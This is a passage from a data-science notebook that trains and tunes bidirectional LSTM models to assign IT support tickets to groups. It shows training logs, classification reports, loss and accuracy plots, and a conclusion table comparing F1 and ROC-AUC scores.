70/70 [==============================] - 223s 3s/step - loss: 1.3446 - accuracy: 0.5762 - val_loss: 1.2058 - val_accuracy: 0.6427
Epoch 9/20
70/70 [==============================] - 221s 3s/step - loss: 1.2636 - accuracy: 0.6036 - val_loss: 1.2155 - val_accuracy: 0.6490
Epoch 10/20
70/70 [==============================] - 222s 3s/step - loss: 1.1437 - accuracy: 0.6359 - val_loss: 1.3134 - val_accuracy: 0.6250
Epoch 11/20
70/70 [==============================] - 223s 3s/step - loss: 1.0819 - accuracy: 0.6547 - val_loss: 1.1429 - val_accuracy: 0.6831
Epoch 12/20
70/70 [==============================] - 222s 3s/step - loss: 1.0184 - accuracy: 0.6739 - val_loss: 1.2047 - val_accuracy: 0.6638
Epoch 13/20
70/70 [==============================] - 222s 3s/step - loss: 0.9318 - accuracy: 0.7029 - val_loss: 1.1202 - val_accuracy: 0.6873
Epoch 14/20
70/70 [==============================] - 221s 3s/step - loss: 0.8717 - accuracy: 0.7195 - val_loss: 1.1776 - val_accuracy: 0.6885
Epoch 15/20
70/70 [==============================] - 216s 3s/step - loss: 0.8127 - accuracy: 0.7387 - val_loss: 1.1072 - val_accuracy: 0.6998
Epoch 16/20
70/70 [==============================] - 219s 3s/step - loss: 0.7586 - accuracy: 0.7473 - val_loss: 1.2282 - val_accuracy: 0.6675
Epoch 17/20
70/70 [==============================] - 223s 3s/step - loss: 0.7100 - accuracy: 0.7631 - val_loss: 1.1684 - val_accuracy: 0.7047
Epoch 18/20
70/70 [==============================] - 222s 3s/step - loss: 0.6683 - accuracy: 0.7819 - val_loss: 1.1668 - val_accuracy: 0.7046
Epoch 19/20
70/70 [==============================] - 216s 3s/step - loss: 0.6446 - accuracy: 0.7912 - val_loss: 1.1883 - val_accuracy: 0.7069
Epoch 20/20
70/70 [==============================] - 222s 3s/step - loss: 0.6324 - accuracy: 0.7907 - val_loss: 1.0864 - val_accuracy: 0.7278
In [71]:
acc_test =model_chgNeur.evaluate(X_test,y_test)
print("Test Accuracy:",acc_test[1])

acc_train =model_chgNeur.evaluate(X_train,y_train)
print("Train Accuracy:",acc_train[1])
266/266 [==============================] - 79s 296ms/step - loss: 1.0864 - accuracy: 0.7278
Test Accuracy: 0.7278294563293457
131/131 [==============================] - 38s 289ms/step - loss: 0.4295 - accuracy: 0.8613
Train Accuracy: 0.8612911105155945
In [0]:
y_predB1 = model_chgNeur.predict(X_test)
In [74]:
groups = ticket_df['Assignment group'].unique()
print('Classification report:\n %s' % (classification_report(y_test.argmax(axis=1), y_predB1.argmax(axis=1),target_names=groups)))
Classification report:
               precision    recall  f1-score   support

       GRP_0       0.96      0.69      0.80      3968
       GRP_1       0.67      0.52      0.58        31
       GRP_3       0.62      0.47      0.53       140
       GRP_4       0.44      0.77      0.56        30
       GRP_5       0.65      0.80      0.72       257
       GRP_6       0.78      0.83      0.81       145
       GRP_7       0.68      0.81      0.74       118
       GRP_8       0.89      0.87      0.88        39
       GRP_9       0.68      0.85      0.75        85
      GRP_10       0.90      1.00      0.95        81
      GRP_11       0.90      0.82      0.86        88
      GRP_12       0.42      0.88      0.57       215
      GRP_13       0.62      0.88      0.73       241
      GRP_14       0.76      0.78      0.77        36
      GRP_15       0.40      0.87      0.55        31
      GRP_16       0.94      0.95      0.94       289
      GRP_17       0.56      0.84      0.67       116
      GRP_18       0.34      0.84      0.48        56
      GRP_19       0.73      0.82      0.77        44
       GRP_2       0.79      0.82      0.81        97
      GRP_20       0.62      0.82      0.71       200
      GRP_22       0.50      0.79      0.61        39
      GRP_24       0.61      0.62      0.62        69
      GRP_25       0.57      0.86      0.69       107
      GRP_26       0.49      0.79      0.61        61
      GRP_28       0.62      0.79      0.70       100
      GRP_29       0.73      0.80      0.77        45
      GRP_30       0.95      0.93      0.94        40
      GRP_31       0.82      0.86      0.84        37
      GRP_33       0.69      0.63      0.66        35
      GRP_34       0.94      0.12      0.22       129
      GRP_40       0.76      0.38      0.50       184
      GRP_41       0.58      0.75      0.65        68
      GRP_42       0.55      0.93      0.69       661
      GRP_45       0.51      0.37      0.42       252
      others       0.57      0.70      0.63       357

    accuracy                           0.73      8491
   macro avg       0.67      0.76      0.69      8491
weighted avg       0.79      0.73      0.73      8491

Plot the accuracy of the classifier

In [75]:
plt.plot(history_B1.history['accuracy'])
plt.plot(history_B1.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()

Plot Loss of the classifier

In [76]:
plt.plot(history_B1.history['loss'])
plt.plot(history_B1.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
In [78]:
#ROC-AUC Score of the Model:
"{:0.2f}".format(roc_auc_score(y_test,y_predB1)*100.0)
Out[78]:
'97.91'

Changing the maxlen from 300 to 150

In [0]:
maxlen= 150
#Now lets reinitialize and do padding the training and testing dataset 
X_train=tokenizer.texts_to_sequences(df['ticket_Desc_lemm'])
X_train = pad_sequences(X_train, padding='post',maxlen = maxlen)
X_test=tokenizer.texts_to_sequences(ticket_df['ticket_Desc_lemm'])
X_test = pad_sequences(X_test, padding='post',maxlen = maxlen)
y_train = pd.get_dummies(df['Assignment group']).values
y_test= pd.get_dummies(ticket_df['Assignment group']).values
In [80]:
#Bidirectional model with maxlen = 150 ,merge_mode="sum" and kernel_initializer as 'GlorotNormal()'
model_chgLen = Sequential()
model_chgLen.add(Embedding(input_dim=num_words, 
                        output_dim=embedding_size, 
                        weights=[embedding_matrix], 
                        input_length=maxlen, 
                        mask_zero=True,
                        trainable=False))
model_chgLen.add(SpatialDropout1D(0.2))
model_chgLen.add(Bidirectional(LSTM(150, dropout=0.2, recurrent_dropout=0.2), merge_mode="sum"))
model_chgLen.add(Dense(100, activation='relu', kernel_initializer=initializer))
model_chgLen.add(Dropout(0.1))
model_chgLen.add(Dense(36, activation='softmax'))
#Configure the model.
model_chgLen.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
#Run the model
history_B2 = model_chgLen.fit(X_train, 
                    y_train, 
                    epochs=epochs, 
                    batch_size=batch_size,
                    validation_data=(X_test, y_test),
                    callbacks=[modelcheckpoint,EarlyStopping(monitor='val_loss', patience=5, min_delta=0.0001)])
WARNING:tensorflow:Layer lstm_1 will not use cuDNN kernel since it doesn't meet the cuDNN kernel criteria. It will use generic GPU kernel as fallback when running on GPU
WARNING:tensorflow:Layer lstm_1 will not use cuDNN kernel since it doesn't meet the cuDNN kernel criteria. It will use generic GPU kernel as fallback when running on GPU
WARNING:tensorflow:Layer lstm_1 will not use cuDNN kernel since it doesn't meet the cuDNN kernel criteria. It will use generic GPU kernel as fallback when running on GPU
Epoch 1/20
70/70 [==============================] - 115s 2s/step - loss: 2.7839 - accuracy: 0.2695 - val_loss: 2.1028 - val_accuracy: 0.4265
Epoch 2/20
70/70 [==============================] - 116s 2s/step - loss: 2.1833 - accuracy: 0.3813 - val_loss: 1.7660 - val_accuracy: 0.4929
Epoch 3/20
70/70 [==============================] - 113s 2s/step - loss: 1.9560 - accuracy: 0.4204 - val_loss: 1.5379 - val_accuracy: 0.5519
Epoch 4/20
70/70 [==============================] - 115s 2s/step - loss: 1.7736 - accuracy: 0.4624 - val_loss: 1.4038 - val_accuracy: 0.5832
Epoch 5/20
70/70 [==============================] - 113s 2s/step - loss: 1.6339 - accuracy: 0.4980 - val_loss: 1.3808 - val_accuracy: 0.5823
Epoch 6/20
70/70 [==============================] - 110s 2s/step - loss: 1.5319 - accuracy: 0.5299 - val_loss: 1.3113 - val_accuracy: 0.6139
Epoch 7/20
70/70 [==============================] - 114s 2s/step - loss: 1.4178 - accuracy: 0.5587 - val_loss: 1.3109 - val_accuracy: 0.6053
Epoch 8/20
70/70 [==============================] - 112s 2s/step - loss: 1.3317 - accuracy: 0.5829 - val_loss: 1.3334 - val_accuracy: 0.6109
Epoch 9/20
70/70 [==============================] - 113s 2s/step - loss: 1.2360 - accuracy: 0.6163 - val_loss: 1.2336 - val_accuracy: 0.6329
Epoch 10/20
70/70 [==============================] - 113s 2s/step - loss: 1.1721 - accuracy: 0.6225 - val_loss: 1.2881 - val_accuracy: 0.6349
Epoch 11/20
70/70 [==============================] - 113s 2s/step - loss: 1.0898 - accuracy: 0.6463 - val_loss: 1.1160 - val_accuracy: 0.6660
Epoch 12/20
70/70 [==============================] - 114s 2s/step - loss: 0.9983 - accuracy: 0.6849 - val_loss: 1.1623 - val_accuracy: 0.6805
Epoch 13/20
70/70 [==============================] - 116s 2s/step - loss: 0.9262 - accuracy: 0.7041 - val_loss: 0.9686 - val_accuracy: 0.7250
Epoch 14/20
70/70 [==============================] - 114s 2s/step - loss: 0.8728 - accuracy: 0.7175 - val_loss: 1.1268 - val_accuracy: 0.6771
Epoch 15/20
70/70 [==============================] - 116s 2s/step - loss: 0.8295 - accuracy: 0.7339 - val_loss: 1.1627 - val_accuracy: 0.6823
Epoch 16/20
70/70 [==============================] - 116s 2s/step - loss: 0.7640 - accuracy: 0.7511 - val_loss: 0.9525 - val_accuracy: 0.7327
Epoch 17/20
70/70 [==============================] - 115s 2s/step - loss: 0.7313 - accuracy: 0.7646 - val_loss: 1.2011 - val_accuracy: 0.6884
Epoch 18/20
70/70 [==============================] - 114s 2s/step - loss: 0.6859 - accuracy: 0.7742 - val_loss: 1.0669 - val_accuracy: 0.7156
Epoch 19/20
70/70 [==============================] - 113s 2s/step - loss: 0.6661 - accuracy: 0.7807 - val_loss: 1.0553 - val_accuracy: 0.7255
Epoch 20/20
70/70 [==============================] - 114s 2s/step - loss: 0.6386 - accuracy: 0.7886 - val_loss: 1.0811 - val_accuracy: 0.7215
In [81]:
acc_test =model_chgLen.evaluate(X_test,y_test)
print("Test Accuracy:",acc_test[1])

acc_train =model_chgLen.evaluate(X_train,y_train)
print("Train Accuracy:",acc_train[1])
266/266 [==============================] - 39s 148ms/step - loss: 1.0811 - accuracy: 0.7215
Test Accuracy: 0.7214698195457458
131/131 [==============================] - 20s 152ms/step - loss: 0.4210 - accuracy: 0.8637
Train Accuracy: 0.8636909127235413
In [0]:
y_predB2 = model_chgLen.predict(X_test)
In [83]:
print('Classification report:\n %s' % (classification_report(y_test.argmax(axis=1), y_predB2.argmax(axis=1),target_names=groups)))
Classification report:
               precision    recall  f1-score   support

       GRP_0       0.96      0.67      0.79      3968
       GRP_1       0.49      0.61      0.54        31
       GRP_3       0.78      0.46      0.58       140
       GRP_4       0.81      0.70      0.75        30
       GRP_5       0.72      0.82      0.77       257
       GRP_6       0.74      0.85      0.79       145
       GRP_7       0.66      0.80      0.72       118
       GRP_8       0.69      0.92      0.79        39
       GRP_9       0.43      0.87      0.57        85
      GRP_10       0.75      1.00      0.86        81
      GRP_11       0.83      0.82      0.82        88
      GRP_12       0.48      0.87      0.61       215
      GRP_13       0.61      0.90      0.72       241
      GRP_14       0.61      0.83      0.71        36
      GRP_15       0.46      0.77      0.58        31
      GRP_16       0.90      0.97      0.93       289
      GRP_17       0.68      0.79      0.73       116
      GRP_18       0.49      0.75      0.59        56
      GRP_19       0.63      0.86      0.73        44
       GRP_2       0.73      0.76      0.75        97
      GRP_20       0.43      0.86      0.58       200
      GRP_22       0.45      0.85      0.59        39
      GRP_24       0.47      0.61      0.53        69
      GRP_25       0.69      0.88      0.77       107
      GRP_26       0.64      0.77      0.70        61
      GRP_28       0.58      0.75      0.65       100
      GRP_29       0.76      0.82      0.79        45
      GRP_30       0.86      0.93      0.89        40
      GRP_31       0.58      0.89      0.70        37
      GRP_33       0.79      0.63      0.70        35
      GRP_34       0.94      0.12      0.22       129
      GRP_40       0.85      0.36      0.51       184
      GRP_41       0.56      0.74      0.63        68
      GRP_42       0.55      0.94      0.69       661
      GRP_45       0.47      0.37      0.41       252
      others       0.59      0.68      0.63       357

    accuracy                           0.72      8491
   macro avg       0.66      0.76      0.68      8491
weighted avg       0.79      0.72      0.73      8491

Plot Accuracy of the classifier

In [84]:
plt.plot(history_B2.history['accuracy'])
plt.plot(history_B2.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()

Plot Loss of the Classifier

In [85]:
plt.plot(history_B2.history['loss'])
plt.plot(history_B2.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
In [86]:
#ROC-AUC Score of the Model:
"{:0.2f}".format(roc_auc_score(y_test,y_predB2)*100.0)
Out[86]:
'97.91'

Conclusion.

In this project, a model based on supervised machine learning algorithms is proposed to assign tickets automatically.Preprocessed dataset consisting of previously categorized tickets are used to train classification algorithms. We have implemented different classification algorithms to evaluate performances comparatively. We tried tuning the model using different hyper parameters for better performance.

Model Tuning Steps F1 Score
Bidirectional LSTM[100 LSTM neurons,maxlen=300] 0.58
Bidirectional LSTM[100 LSTM neurons,maxlen=300,merge-code='sum'] 0.60
Bidirectional LSTM[100 LSTM neurons,maxlen=300,merge_mode="sum",with L1,L2 regularizer in the dense layer] 0.50
Bidirectional LSTM[100 neurons,merge-code='sum',kernel_initialiazer=GlorotNormal() in Dense layer] 0.57

State of the Art NLP Model:

Model F1 Score
BERT[Uncased: 12-layer, 768-hidden, 12-heads] 0.64


After Clubbing minority groups and undersampling GRP_0 in the training set :

Model Tuning Steps F1 Score ROC-AUC Score
Bidirectional LSTM[100 LSTM neurons,maxlen=300,merge-code='sum',kernel_initialiazer=GlorotNormal in Dense layer] 0.69 97.72
Bidirectional LSTM[150 LSTM neurons,maxlen=300,merge-code='sum',kernel_initialiazer=GlorotNormal in Dense layer] 0.73 97.91
Bidirectional LSTM[150 LSTM neurons,maxlen=150,merge-code='sum',kernel_initialiazer=GlorotNormal in Dense layer] 0.73 97.91